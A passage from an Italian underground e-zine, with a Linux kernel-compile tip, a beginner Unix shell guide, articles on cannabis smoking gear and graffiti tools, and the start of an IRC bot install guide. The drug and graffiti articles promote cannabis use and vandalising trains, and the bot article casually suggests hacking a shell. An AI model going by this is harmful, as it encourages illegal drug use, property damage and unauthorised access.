(anche con un minimo di inglese) oppure accanto ad un comando c'e il bottone "HELP" andate su Yahoo e gli scrivete il testo e ve lo traduce oppure usate il vocabolario CMQ IO VI CONSIGLIO DI IMPARARVI BENE L'INGLESE SENNO SARETE A MARI (come si dice qui ;p). Ogni voce che man mano si attiva ho disattiva si presenta con tre possibili scelte: N m Y. Cmq ricordate che ancora non state compilando niente state solo modificando un semplice file txt tra un po arriva il bello =) quindi..... Appena finite tutto uscite e salvate e sempre nella stessa directory dove avete scritto "make xconfig" cominciate a lanciare i seguenti comandi (la compilazione vera e propia" make dep make clean make bzImage (occhio alla maiuscola) (ricordate sempre che linux è a case-sensitive?) make modules make modules_install Appena terminate tutti i comandi prendete il file System.map sempre nella stessa cartella e copiatelo su /boot/ quindi sempre dalla directory lanciate "cp System.map /boot/" Adesso e necessario aggiornare lilo: (usate lilo e non grub) { /etc/lilo.conf } Esempio della modifica che ho apportato al mio lilo.conf cmq basta che seguite le scritte riportate nel vostro lilo.conf poi interpretarli sono una cavolata. image=/boot/my_kernel label=my_kernel root=/dev/hda7 append=" mem=160M hdc=ide-scsi ide1=autotune ide0=autotune" vga=788 read-only Adesso aggiorniamo il mbr scrivendo "lilo" e purtroppo questa è l'unica volta che il linux ha bisogno di un reboot riavviate e controllate la fase di caricamento se vi da qualche failed rimodificate il kernel nella voce del failed e ricompilate il tutto se invece non vi da errori correte a comprare una torta per festeggiare la vostra prima ricompilazione. >>---> Adesso si finisce =( <---<< Anche questo txt è arrivato al termine spero di essere stato chiaro e coinciso e che non vi abbia fatto rovinare tutto =) scherzo cmq se avete bisogno di consigli aiuti etc.. feltonspray@katamail.com vi saluto, FeLtOnSpRaY ··············································································· ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× __ o __| __ __ __| __ o \_' (__| (__(_ | (__| (__( (__( (__| (__(_ | ) | / \ __/ ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: Guida ad Unix] [Autore: Rhost] Guida a Unix (Guida, non hack) Vi anticipo subito di kosa parlerò in questa guida, così a ki non interessa può fare a meno di leggerla. :o\ · Come iniziare · I comandi principali · La programmazione con la shell di Bourne e la C shell · Programmazione in C in ambiente Unix Ringraziamenti: Qui ci si dimentica sempre di qualcuno vabbè. 1. Ringrazio gli SPP tutti ed in particolare -=RigoR MorteM=- per la sua cordialità 2. Cookbooker per essermi ankora amiko ed aver creato l’ UMCREW 3. Tutti quelli ke mi danno una mano nella lotta alla pedofilia 4. Ulisses1 per avermi dato la possibilità di ricambiargli un favore fattomi 5. La LeGaCy_Of_KiNgS per credere ankora in me (presto un nuovo sito) Gli argomenti trattati partono dal presupposto ke abbiate già il sistema operativo installato e quindi riusciate almeno ad arrivare a questo punto: unixtype!login:_ dove inserirete il vostro ID utente e poi avrete Password: dove inserirete con molta attenzione la vostra password, questa non è leggibile durante la digitazione quindi in caso di errore avrete un messaggio fatto così: login incorrect Se avete inserito tutto correttamente vedrete visualizzato il prompt della shell e sarete pronti ad utilizzare i comandi Unix. Unix dispone di parekkie shell utilizzabili, quelle disponibili dipendono dalla versione di Unix installata, la shell è in pratika l’interfaccia fra voi ed il computer, le due shell più famose sono la shell di Bourne e la C shell . Le shell le potete distinguere dalla diversità del prompt, quella Bourne utilizza il simbolo $, la C shell invece il simbolo % con un contatore ke tiene nota dei comandi ke date, avrete quindi 1%, 2%, 3% ecc... Le due shell fondamentalmente lavorano allo stesso modo, quando citerò comandi ke si differiscono lo farò presente, sempre se mi ricordo... Faccio un esempio delle differenti shell? Ok, lo faccio: xenix386!login: rhost Password: Welcome to SCO XENIX System ! From The Santa Cruz Operation, Inc. Terminal type is ansi $_ login: rhost Password: Welcome to UCXX Unix. 1%_ 1. Le shell di Unix C’è da dire ke alkune installazioni hanno shell molto più complete, ma a parte il fatto ke non le conosco tutte... non finirei mai questa guida se dovessi citarle, quindi tratterò solo queste ke sono da considerarsi quasi degli standard, anzi la shell di Bourn ($) è davvero quella standard di Unix. Più andremo avanti, più vi renderete conto ke questa guida non ha ne capo ne coda, cioè non avrà un inizio, una parte centrale ed una fine, ma sarà come mi viene in mente. Abbiamo dunque parlato dell’accesso al terminale inserendo Id e Password, ora invece di continuare con il corpo della guida, vediamo come ci si disconnette dal sistema e non perkè la guida finisce qui, è solo ke lo dico adesso come ci si disconnette e mi tolgo il pensiero. 2. Scollegamento Quando terminate una sessione di Unix dovete scollegarvi dal terminale, se non lo fate qualcun altro potrebbe avere accesso immediato ai vostri file. Se vi scollegate correttamente sullo skermo riapparirà il prompt di login. Il processo di scollegamento varia a seconda della shell utilizzata, la shell di Bourne ($) usa il comando EXIT, mentre la C shell usa il comando LOGOUT, in quale caso funzionano ambedue i comandi, ma non kiedetemi il perkè ke non lo so. Per esempio se al promp %_ digitate exit , Unix potrebbe rispondere inviando il comando logout , ma se avete il prompt $_ e digitate logout , vedrete il messaggio logout: logout not found, spiegando ke il comando logout non è valido. Quasi tutte le versioni di Unix riconoscono il comando Ctrl-D come una rikiesta di scollegamento, ma mi sembra di aver capito ke in molte installazioni di Unix questo comando sia stato disabilitato, in quanto la rikiesta di disconnessione immediata termina anke altri processi di Unix. 3. Inserimento delle righe di comando Quando digitate dopo il prompt della shell, state inserendo dei caratteri un un’area di memoria nota come Buffer della riga di comando . Quando pigiate RETURN alla fine della riga di comando, Unix accetta il contenuto del buffer come ruga di comando e lo elabora. Se Unix non capisce il vostro comando vi invierà un msg di errore come: command: not found . Quando succede questo, rileggete il comando ke avete dato, di solito vi renderete conto di aver commesso un errore di battitura. Per esempio se siete nella C shell e digitate logoff vi verrà visualizzato quell’errore e vi renderete conto ke il comando corretto era logout e non logoff. 4. Operazioni sui file Precisiamo ke Unix distingue tra maiuscole e minuscole, per cui il comando cp , non può essere digitato come CP ed aspettarvi ke funzioni. Uno dei comandi + semplici è per esempio quello di far visualizzare ad Unix la data e l’ora. Basta digitare date dopo il prompt della shell per ottenere questo: $ date Sun Mar 11 13:59:43 PDT 2001 Quindi riapparirà il prompt della shell $ in attesa di un nuovo comando, in quanto il comando date non rikiede alkuna informazione da voi. Per visualizzare a video il contenuto di una directory il comando da da re è ls , per avere cioè una LiSta del contenuto della dir. Se la vostra cartella contiene file allora avrete un risultato + o - simile a questo: $ ls indirizzi lamahlist slava_doc $_ I file vengono visualizzati alfabeticamente, ma si può associare al comando ls quale opzione per avere una visualizzazione personalizzata. (spero di ricordarmeli tutti o quasi) Comando: ls Scopo: Elencare i file in una directory Formato: ls [opzioni] [lista-file] Opzioni: -a Elenca tutti i file, compresi quelli nascosti. -d Elenca soltanto i nomi delle direcotory, non dei file ordinari -g Mostra info sui gruppi di un elenko -l Mostra le liste lunghe con informazioni estese -r Produce una lista in ordine inverso -s Produce un elenko per dimensione crescente -t Elenca in ordine di tempo, a partire dal + recente Queste opzioni possono essere associate, cioè possiamo dare il comando ls mettendo 2 opzioni, quindi ls - ra . L’opzione + usata (da me) è ls -l ke produce un elenko lungo come questo: ls -l -rwxr-xr-x 1 rhost 14334 Nov 19 14:58 indirizzi -rwxrw-r-x 1 rhost 1298 Mar 3 09:32 lamahlist -rw-rw-rw 1 rhost 8900 Feb 12 09:56 salva_doc (accesso) (link) (user) (dimens) (ultima modica) (nome file) Da notare ke i nomi dei file sono posizionati a dx della skermo, alcune versioni di Unix però possono mostrare questo elenko in modo leggermente diverso, potreste ottenere per esempio oltre al nome utente (user) anke il nome del gruppo di appartenenza, ma non so dirvi esattamente quali versioni siano. Le altre opzioni limitano o espandono il nr di file ke sono elenkati . Ogni directory contiene file nascosti oltre a quelli ke vedete elencati, se attivate l’opzione -a nel comando vedrete i nomi dei file nascosti oltre a quelli ordinari. Per ottenere la visualizzazione di un calendario, (voi direte: Ma a noi ke ce frega der calendario?) Zitti!!! Capirete perkè. Dicevo, per visualizzare a video un calendario il comando da conoscere è cal . Alkuni sistemi al comando cal visualizzano il mese precedente, quello in corso ed il successivo, altri invece non conoscono il comando senza argomenti, cioè per visualizzare un mese il comando sarà: cal 3 2001 per l’anno cal 2001. 5. Ridirezione Abbiamo detto quindi ke il comando cal ci permette di avere a video un calendario... ma se noi lo volessimo su file? Boh!! J Useremo la ridirezione nella riga di comando per cambiare l’output dallo skermo del terminale ad un file. (per output intendo lo skermo, per input la tastiera, dovevo dirlo prima, ma non mi va di tornare indietro e trovare un punto adatto per inserirlo). Il simbolo di ridirezione è il segno maggiore sulla tastiera (>). Se digitate cal 2001 > anno2001, il calendario del 2001 non viene visualizzato a video, ma verrà inviato in un file denominato anno2001, se date il comando date > salva.data, le informazione su data e ora ke normalmente sarebbero visualizzate a skermo, saranno trasferite nel file salva.data. Allo stesso modo potete creare un file contenente l’elenko della directory. Il comando da dare è ls > mieifile, dove mieifile conterrà l’output del comando ls. Siccome Unix è stupido, perkè crede ke noi siamo intelligenti, presume ke quando diamo un comando sappiamo al 100% quello ke stiamo facendo e quindi non si preokkupa di avvisarci sei il file mieifile esiste e lo sovrascrive... :o\ ma noi siamo sicuri di ciò ke stiamo facendo? Io no, mai. Per ridurre il problema possiamo ridirezionare il file con 2 segni >>, in questo modo Unix accoderà il contenuto del nuovo file a quello esistente, ponendolo cioè alla fine di questo. 6. Operazioni sui file Adesso vedremo come visualizzare il contenuto di un file sullo skermo, copiare i file, spostarli e rinominarli, cancellarli e farli stampare. Comando: cp Scopo: Copiare un file. Formato: cp file-sorgente file-destinazione Esempio: cp file1 file2 Risultato: Ci sono ora 2 file identici con nomi differenti. Si può quindi copiare un file ed assegnare alla copia un nuovo nome, producendo così 2 file identici. Il comando cp quindi serve per CoPiare i file. Se nominate un file sorgente inesistente avrete un msg di errore tipo: cp: cannot access file inesistente . Se invece nominate un file di destinazione ke esiste non avrete msg ke avvisano la sovrascrittura . Potete rinominare un file tramite un comando simile, il comando mv serve a MuoVere (spostare) il contenuto di un file sorgente in uno di destinazione, cancellando a sua volta il sorgente, cioè rinomina il file sorgente con quello di destinazione lasciando 1 solo file destinazione... non ho capito neppure io... Questo comando può essere utilizzato per trasferire un file in una directory diversa. Comando: mv Scopo: trasferire o rinominare un file Formato: mv sorgente destinazione Esempio: mv file1 file2 Risultato: Esiste un solo file col nome di destinazione Per cancellare i file invece il comando è rm da RiMuovere. Il comando senza opzioni non kiede conferma dell’esecuzione... Comando: rm Scopo:(raramente) Rimuove uno o più file. Formato: rm [opzione] file Opzione: -i (chiede conferma prima di cancellare) Esempio: rm lamahlist Risultato: Il file non è più visualizzato ne disponibile Spesso vorrete vedere cosa contiene un file prima di cancellarlo o modificarlo, per questo potete utilizzare il comando cat ke però... questo comando ha molti usi ed effetti diversi, uno dei quali è il conCATenamento dei file. (Questa sarà dura....) Se usate il comando cat senza argomenti, questo utilizzerà i dispositivi standard di input ed output (tastiera e video)... se digitate una riga dalla tasiera con il comando cat, questa verrà ripetuta sullo skermo, se utilizzate la ridirezione e nominate un nuovo file inserirete i dati direttamente dalla tastiera nel file, se con il comando cat utilizzate il nome di un file esistente, questo verrà visualizzato sullo skermo. Potete anke utilizzare il comando cat per concatenare file con i simboli di reindirizzamento > e di aggiunta alla coda >>. Ok passiamo al dettaglio... Quando inserite dalla tastiera il comando cat file1, l’intero contenuto del file1 verrà visualizzato sullo skermo. Se la visualizzazione dovesse superare una pagina video si può bloccare lo scorrimento con la combinazione dei tasti CTRL+S e riprenderla con CTRL+Q. Si può utilizzare anke il comando more come nel dos, am ne parleremo fra un po. Potete copiare file con il comando cat o concatenarli tramite la ridirezione, per esempio se utilizzate il comando cat file1 > file2 ha esattamente lo stesso effetto di cp file1 file2, cioè copia un file su un altro senza modificare l’originale. E’ possibile anke combinare dei file, con comandi come cat file1 file2 > file3. In questo caso i 2 file (file1 e file2) sono stati inviati in sequenza ad un file ridiretto (file3). Come creare un file tramite il comando cat: Come avevo detto prima se utilizzate il comando cat senza argomenti, sto scemo non farà altro ke ripetere ciò ke scrivete :o\.. avrete quindi... $ cat indirizzi Stefano Grimaldi Viale Manzoni, 5 20100 Milano $ _ Quando premerete CTRL+D, il comando cat è terminato ed il file appena creato viene kiuso. Se poi usate il comando cat indirizzi verrà visualizzato sullo skermo quello ke avete digitato. Il comando more: Questo comando more (ankora) è disponibile in quasi tutte le installazioni di Unix, il suo scopo è solo quello di visualizzare un file, in pratika visualizza il contenuto di un file blokkandosi pagina per pagina visualizzando la dicitura ---More--- ed un valore in % di quanto è stato visualizzato fino a quel momento. Per proseguire nella visualizzazione bisogna premere spazio dalla tastiera e si avrà la skermata successiva. Stampare i file: Per stampare i file con Unix ci sono diversi modi. Il modo + semplice è quello di inviare direttamente il file alla stampante. Unix ha un sistema di spooler di stampa per cui tutti i file vengono inviati ad una coda di stampa. Il comando di stampa è lpr (Line PRinter), non è possibile stampare programmi eseguibili ne file binari, a meno ke non riuscirete a visualizzare questi file sullo skermo del pc. Nel comando potete nominare uno o più file per poter dare una sequenza di stampa, se per esempio scriviamo lpr indirizzi otterremo + o - questo: $ lpr indirizzi request id is prop-9 (1 file) $_ Il request id serve per individuare ed eventualmente eliminare il processo di stampa utilizzando per esempio il comando cancel prop-9 rimuoverete il file dalla coda di stampa. Se la stampa fosse già partita, si blokkerebbe nel punto in cui noi blokkiamo il processo. La stampa effettuata con lpr è priva di formato, cioè il testo viene stampato di continuo senza interruzioni di pagina. Per ottenere una stampa più ordinata dovreste utilizzare un editor di testi come vi o procurarvi un programma di formattazione testo. Comando: lpr Scopo: Stampare uno o più file in locale Formato: lpr [opzioni] [file] Opzioni: -c Copia un file prima di stamparlo -m Usa mail per avvisarvi ke la stampa è terminata -r Rimuove il file dopo averlo stampato Esempi: 1) lpr indirizzi 2) lpr -c salvato 3) lpr -r nuovofile indirizzi 7. Le directory ed i file di Unix .... Boh? Il sistema operativo Unix gestisce... no Il sistema operativo Unix impiega una struttura di directory ad albero, cioè gerarkika, per memorizzare i file. La directory primaria, cioè radice, è in cima all’albero. Ogni directory può contenerne altre così come può contenere file... ma ke sto a di? .....ok. Partendo dalla dir principale (radice), al suo interno ne troveremo altre ke riameremo di sistema, cioè necessarie al sysop (sistema operativo) per il suo corretto funzionamento. Per esempio la dir bin contiene i file binari dei programmi di servizio, la directory dev comprende i file ke descrivono i vari dispositivi (device) ke Unix può usare, inclusi terminali e stampanti. La directory usr contiene una directory per ogni ID utente (user) riconosciuto dal sistema. Quando lavorate con Unix, la directory in cui vi trovate al momento, è riamata directory di lavoro, di default o corrente. Quando ricollegate con Unix, siete posti automaticamente nella dir prestabilita per il vostro user id, per cui è la vostra directory di lavoro, cioè la home direcory. Per sapere qual è la vostra dir di lavoro potete usare il comando pwd , sullo skermo apparirà il nome completo della dir in cui vi trovate: $ pwd /usr/rhost $_ La dir stessa si kiama rhost, il resto specifica il percorso in cui questa si trova. Lo slash (/) all’inizio della riga la dir radice, gli altri congiungono in sequenza i nomi delle successive. Per indicare un particolare file occorre mettere uno / dopo l’ultima dir indicata, cioè il percorso per il file indirizzi nella cartella rhost sarà: /usr/rhost/indirizzi, cioè il file indirizzi si trova nella cartella rhost ke a sua volta si trova nella cartella usr e questa alla fine è contenuta nella dir radice . Se per esempio il vostro nome utente è laming la vostra cartella di lavoro sarà /usr/laming, ma con la shell di Bourne per fare riferimento alla vostra home, potete digitare $HOME ke korrispnde a /usr/laming, nella C shell il comando %HOME ha lo stesso effetto. Come avevo scritto prima per visualizzare i file della vostra directory di lavoro potete utilizzare il comando ls, ma potete usare questo comando anke per vedere i file di un’altra dir. Ad esempio, potete usareil comando ls /usr per visualizzare il contenuto della dir /usr, mentre con ls / vedrete i file della dir radice. Su Unix non è semplicissimo distinguere un file da una directory, per vedere quali sono le dir usate l’opzione -l (elle). Il primo carattere di una riga sarà allora d per le directory ed un - per file di altro tipo: ls -l (elle) -rwxr-xr-x 1 rhost 14334 Nov 19 14:58 indirizzi drwxr-xr-x 1 rhost 1298 Mar 12 11:32 progetti -rw-rw-rw- 1 rhost 8900 Feb 12 09:56 salva_doc $_ Il secondo file visualizzato è una directory e si kiama progetti . Anke il comando -d può essere utile, ma si limita alla visualizzazione delle sole dir: ls -d progetti $_ oppure: ls -ld drwxr-xr-x 1 rhost 1298 Mar 12 11:32 progetti progetti $_ Quando fate riferimento ad un file ke si trova nella vostra directory di lavoro, potete specificare direttamente il nome del file. Se il file si trova in una dir diversa allora dovete specificare il percorso di questo. Fate conto ke la vostra dir di lavoro sia rhost e ke quella di un vostro collega ke lavora allo stesso progetto sia darkman , allora le vostre rispettive dir saranno : /usr/rhost e /usr/darkman . Per far stampare il file indirizzi nella vostra cartella di lavoro userete lpr indirizzi , se invece volete stampare lo stesso file ma dalla cartella di darkman il percorso di stampa sarà: lpr /usr/darkman/indirizzi. Naturalmente dovete avere il permesso di accedere alla cartella del vostro amico, ma della sicurezza ne parleremo dopo. Quindi inserendo il percorso di ogni file possiamo associare qualunque comando. I comandi cp ed mv ci permettono di specificare una directory o un file su cui copiare o trasferire un file: lpr /usr/rhost/indirizzi cat /usr/rhost/indirizzi cp /usr/rhost/lamahlist lamahlist2 cp backdoor /usr/darkman/pamela mv blazerstrong /usr/darkman/ahah rm /usr/darkman/pamela Unix riesce a distinguere le directory in modo particolare... Per esempio se io fossi nella dir /usr/rhost, posso dire ke la dir usr è padre della dir rhost, quindi Unix riconosce con / la radice, con . la dir di lavoro e con .. la directory immediatamente sopra a quella di lavoro... Quanto amo gli esempi: Se mi trovo nella cartella /usr/rhost e voglio andare nella cartella darkman, mi basta digitare ../darkman. Così facendo è come se dicessi a Unix: Parti dal padre della directory corrente, trova la directory darkman sotto di essa e rimani la. Ricordatevi ke per avere accesso in altre cartelle di lavoro dovete avere l’accesso autorizzato. Per verificare i diritti di accesso in una directory potete usare il comando ls -l /usr, potreste avere un elenko simile: drwxr-xr-x 2 rhost 1298 Mar 13 12:20 darkman Se la linea inizia con drwx , allora avrete tutti i diritti di accesso di cui avete bisogno per operaresu questa directory. Per creare una directory il comando è mkdir (MaKe DIRectory:crea directory). Supponiamo di essere nella cartella rhost e scriviamo mkdir prova, Unix creerà una nuova dir dal nome prova. Se poi digitatez il comando ls vedrete ke il nome prova sarà presente nell’elenko dei file. Se digitate il comando ls -l vedrete ke prova sarà indicata come dir e non come file. Quindi il comando mkdir /usr/prova creerebbe una nuova dir al livello sottostante a quello di /usr . Potete dunque divertirvi a creare dir a piacimento, purkè siano sempre ben catalogate, avrete notato ke kon Unix non si usano click di mouse per aprire o cercare cartelle, quindi vi consiglio di essere sempre molto ordinati. Esempio: $ pwd /usr/rhost $ mkdir progetti $ mkdir ricerca $ mkdir progetti/bbs $ mkdir progetti /dos4 $ mkdir progetti/cobol $ mkdir ricerca/japan $mkdir ricerca/japan/baud2400 $ pwd /usr/rhost $_ Notate ke la cima delle struttura è la vostra home directory, rhost, anziché la home radice. Per l’ultima dir creata ricerca /usr/rhost/ricerca/japan/baud2400 avreste potuto usare $HOME/ricerca/japan/baud2400. Fine Prima Parte ;o) _____________________________________________________ | __ _ ___ _____ _____ _____ ______ | | | \ | | / | | _ \ / ___| / _ \ |___ / | | | \| | / /| | | |_| | | | | | | | / / | | | |\ | / / | | | _ / | | | | | | / / | | | | \ | / / | | | | \ \ | |___ | |_| | / /__ | | |_| \_| /_/ |_| |_| \_\ \_____| \_____/ /_____| | ----------------------------------------------------- ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× __ __ __ __ __ __ | ) (__( | ' (___ (__) __) ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: NARCOS(o qualcosa del genere)] [Autore: FREESTO] eccomi qua per fare un bell'articolo che vi servirà di sicuro nella vita (:-D hihihi)...NARCOS...o meglio...STRUMENTI...:) dato che sono contro l'alcool eccetto quello che va nel bong(e non ne so niente)o di altre droghe,parlerò solo di ganja e fumo...se non vi va bene fate un articolo voi e mandatelo :-D ~~~~~~~ CIBO: fra poco mangio:ravioli al ragù "ROBA" BEVUTA: mha...nada...sono contro l'alcool ma sto sorseggiando fanta :) "ROBA" FUMATA:):naaaa son ancora storto da ieri sera,scherzo io sono un bravo bimbo..no? TEMPO:diciamo mezz'oretta? MUSICA:missione impossibile(in questo momento joe cassano...dimmi che ganja usi,albanese ammoniacata?sicuro che ne abusi...rest in peace gio!) SALUTI:my love weeda,my click ebc,6mani,#doppiah,mangiare,cure,mystic,cookbooker,ulisses1,felton... FUCK TO:umh...fanculo a chi mi sta sul cazzo(non ho voglia di scrivere tutti...) FRASE LIBERA:LEGALIZZALA! ALTRO DA DICHIARARE?:sono innocente! ~~~~~~~ qua devo metterci il solito diclaimer?umh...qua ci stanno solo informazioni se fate qualcosa e andate nella merda cazzi vostri io non centro e io son pulito non ho mai fatto niente! :) ok iniziamo...qua non ci starà un testo sulla coltivazione xchè...non son capace ok?non c'ho mai provato qua parliamo un po' di...STRUMENTI vai!cartine(smocking),ganja,filtrino,sigarette,strumenti vari... per una cannetta normale non penso che ci siano spiegare molte cose...cartina(smocking rulez)ganja o fumo,filtrino fatto con bigliettini del treno :))la sigaretta per lo svuotino... CILUM o come cazzo si scrive...CEELOOM bho oh cazzo ma riuscirò a spiegare bene? è una cosa...che ci metti dentro un coso così da ottenere una cosa...scherzo è una specie di tubo con una pietrina dentro(che fa da filtrino)dentro ci va quello che bisogna metterci :)si accende,si fuma,si finisce e si svuota(questa parte è dura...) il cilotto spacca,ma il brutto è che dopo qualche tiro è tutto finito,secondo me è bello gustarsi la ganja o no? è fatto + o - così ___ <--qui va messa la robaccia che usate voi drogatoni!schifosi...:) | | | | | | \_/ <--da qui si tira shhhh shhhhhhhhhhhhhhh e dentro va messa la pietrina che roba è?sembra un cazzo occhio a non farlo cadere che si spacca! per pulirlo usate dei fazzoletti(che non si rompino facilmente)e li infilate dalla parte dove va messa l'ashish o ganja,è un'impresa ARDUA! BONG cazzo questo si che ti spacca,se il bong è buono! penso che sia tipo il narghilè,o forse è la stessa cosa,o forse...non so! qua ci vuole oltre alla roba elencata prima anche acqua o qualcosa di alcolico(se alcolico stona di + e alla fine va bevuta...l'altra volta il vino dentro faceva schifo ma ci ha dato una bella botta,dato che il THC rimane nel liquido,eccetto l'acqua...o almeno credo) vai con i disegni(sul pc sono un disastro...aiuto,help,s.o.s...) ____ <---qui va messa la roba da fumà \ / _||_ / \ <---se ricordo bene qua si svita e si mette l'acqua o alcool | | \____/===== <---di qua si tira SHHH SHHHHHHHHZZZZ e poi si tossisce :) spacca di brutto,se mettete dell'alcool il fumo prenderà un po' di quel gusto il bong si può fare anche con una bottiglia...non faccio il disegnino che non ci sto + dentro...xò se avete capito com'è fatto un bong pensate come si può farlo con una bottiglia...c'è bisogno di una canna al posto del posto dove mettere la roba... minchia son proprio un disastro a disegnare sti cosi PIPETTA o come si chiama..io la chiamo così in pratica è uguale al bong...non riesco a disegnarlo mi spiace...è un tubo arrotolato dove va messa acqua,da una parte va infilata la canna,dall'altra si tira SHHHH SHHHHHZZZ(se non l'avete capito questo è il rumore di una MEGA-ULTRA-EXTRA tirata) :) CARTINE A BANDIERA cazzo non abbiamo cartine lunghe...c'abbiamo solo quelle merdose rizla corte come facciamo?!? tranquilli ragazzi ci pensa il mago freesto :)) ___________ | | LA CARTINA VA MESSA IN ORIZZONTALE | | |.........|<--la colla è in basso | \| | \| | \| | \| |___\| la colla sta volta è in verticale,come la cartina quindi una cartina rimane attaccata all'altra e forma una cartina lunga...no?,poi si gira e si trappa la carta in eccesso... c'è bisogno di due cartine corte...mi sembra che dal disegno si capisca come vanno messe "\|" e ".." è la colla se date retta a me prendetevi le rools o le smocking :) qua è tutto!ci si becca nel prossimo numero di UNDERGROUND MAGAZINE...mo stiamo cercando di fare il chan irc...che schifo di articolo che è venuto fuori...mi scuso con quelli che disegnano in asci! :-) ci si becca rigaz!!! PEACE & RESPECT FREESTO www.ebclick.cjb.net __________________________________________________________ | _ __ _____ _ _____ _ __ _ _____ | | | | / / | _ \ | | |_ _| | | | \ | | / ___| | | | | __ / / | |_| | | | | | | | | \| | | | | | | | / | / / | _ / | | | | | | | |\ | | | _ | | | |/ |/ / | | \ \ | | | | | | | | \ | | |_| | | | |___/|___/ |_| \_\ |_| |_| |_| |_| \_| \_____/ | ---------------------------------------------------------- ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× __ o _|_ o __ __ (__(__( | ' | |_, | | ) (__| __/ ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: Writing (parte 2)] [Auore: freesto aka lacri l'acrilico] musica ascoltata:DE LA SOUL (old school style!) cibo:ho appena finito di mangiare... bibita:leggete sopra saluti e thx:my love weeda,la mia cru ebclick(www.ebclick.cjb.net),6maniclick,komboclustasquad(bunjee, rode, radon),il resto di #doppiah(cernusco,nash,rokkosmiko,iceflame,djciussa...) e i saldini, mang(M4nG|4r3),cure, mystic,cookbooker,ulisses1,umcrew, e tutti quelli che mi sono dimenticato SEMPRE IN FOTTA UOMO FUCK TO:verrebbe molto lunga sta lista...ma riassumiamo...i politici,i pulotti,tabbozzi,bill gates,il negozio di computer sotto casa mia ~~~~~~~~~~~~~~~ allora eccoci finalmente al secondo numero di underground magazine,nell primo numero penso di essere stato noioso ma in qualche modo dovevo iniziare,ora inizia il bello(spero)nei prossimi numeri parlerò anche della cultura hiphop e di tutto quello che posso,che ho voglia e che cukbuker mi fa dire :-) vai si inizia ricordate che se volete andare a dipingere o a "imbrattare" i muri io non centro e son cazzi vostri,questo è solo un testo di info e blablabla,quindi se vi sgamano non cagatemi il cazzo,è illegale (e se dovete devastare fatelo bene,non come me :-) ) MARKER: i pennarelli,si chiamano anche taggarelli,ne esistono di molti tipi e dimensioni, a vernice,inchiostro,tempera...1cm,0.5,2,3,4,5,6 e cosi via sconsiglio i marker troppo grossi,prendeteli solo se fate bombing in metro,autobus,treni... quelli da 2 e 1 bisogna averli... BOMBOLETTE: bombole,boccie,bonze,bombz... molte marche... montana(che consiglio...secondo me le migliori), felton tanke(feltonspray dalla redazione mi dice che son le meglio..non lo so,rilasciano uno strato "gommoso" e vanno bene anche sui muri umidi...quante volte ci siamo trovati sotto la pioggia a non saper cosa fare con una bomboletta?!?) talken(normali...qua le mettono a 11mila e sono le uniche bombolette decenti...ormai le ordino via telefono ai vari negozi le bombolette...se da voi costano poco pigliatele) happy color(che sgrezze mamma mia...ve le sconsiglio) vi ho elencato solo le marche + famose...ce ne sono molte altre! ricordate che non tutti i caps vanno su tutte le bombolette! TAPPINI o caps molti tipi di tappini,non posso elencarli tutti,e non tutti vanno su tutte le bombolette vi dico i + semplici e famosi fat cap(fanno lo spruzzo molto grosso,usateli per i riempimenti,ma sprecano molta vernice...) big fat(come sopra...ma lo spruzzo è + grosso) skinny,skinny banana ecc...(lo spruzzo è normale...io senza skinny non sopravvivo,lo uso anche nei riempimenti,è il migliore) direzionale(ecco un cap strano...fa lo spruzzo a righe) soft(mai usati, e non ricordo a cosa servono...forse per gli outline) SILENZIATORE silenziatore...no non toglie il rumore del gas,ma della pallina all'interno della bomboletta,quante volte vi trovate in mezzo alla gente con nello zaino una bomboletta mezza vuota che fa trrrrrrrrrrrrrrrr trrrrrrrrrrr e tutti vi guardano male...il silenziatore è una calamita molto forte che va applicata sul fondo della bomboletta così attrae la pallina e il gioco è fatto ho ancora tempo...l'articolo mi sembra un po' vuoto...proseguiamo hey raga compratevi della carta adesiva,schiaffatevi sopra la vostra tag,il vostro sito o che cazzo volete e andate in giro attaccando gli stickers di qua e di là,semplice no?e veloce!vai con lo streetteam raga!www.beatuno.com il primo streetteam nazionale italiano! con questo chiudo,ci ribecchiamo il prossimo numero,vi racconterò qualcosa sulla cultura hiphop se ce la faccio...magari faccio un articolo sulla ganja e fumo...magari per questo numero...mo chiedo a cookbooker...ci si becca bro ricordatevi: è ARTE NON VANDALISMO... per finire cito alcuni versi... "chi non segue il gregge sa leggere tra le rime...l'hiphop è un mezzo,non un fine!..." "col cazzo che ci freni,mettetevi sereni,che devasteremo nel deposito dei treni..." LOTTA ARMATA! PEACE and RESPECT for allLlLll FRE[E]STO aka L4cR1 l'acilico www.ebclick.cjb.net #doppiah freesto@libero.it ______________________ | _ _____ _____ | | | | | _ \ / ___| | | | | | |_| | | | | | | | | _ / | | | | | | | | \ \ | |___ | | |_| |_| \_\ \_____| | ---------------------- ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× o __ __ _|_ __ | | __ __ ___ __ |__ __ _|_ | | ) __) |_, (__( |_, |_, (__( | ' (__/_ (__(_ | ) |__) (__) |_, ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: Installare un bot] [Autore: Cookbooker] Alura... se state leggendo questo artikolo vuol dire ke, probabilmente, avete bisogno di un bot... kome? kos'è un bot!? Umh... beh, diciamo ke un bot serve a "proteggere" un chan (o a fotterne uno :o)), il bot è un utente fisso di IRC, una volta oppato nel vostro chan soltanto voi e i vostri amici potrete essere oppati. Un bot deve essere installato su una shell, si trovano molte shell gratuite... MA non vanno bene per installarci un bot, le shell gratuite, infatti, una volta ke vi siete disconnessi, terminano tutti i processi da voi attivati e quindi anke il bot... :o\ Kosa possiamo fare? 1) affittare una shell 2) hackarla :) Nel kaso vogliate affittarne una :P eccovi una lista di Provider ke offrono spazio per il vostro bot: ×××××××××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××indirizzo×××××××××××××××××××prezzo××××××× ×××××××××××××××××××××××××××××××××××××××××××××××××××××× »http://www.dungeonfyre.com««««««««««««« $ 15.00 »»»»» »http://www.unixrules.net««««««««««««««« $ 15.00 »»»»» »http://www.ssc.no/««««««««««««««««««««« Kr 900 »»»»» (N.d.R. e ke kazzo di 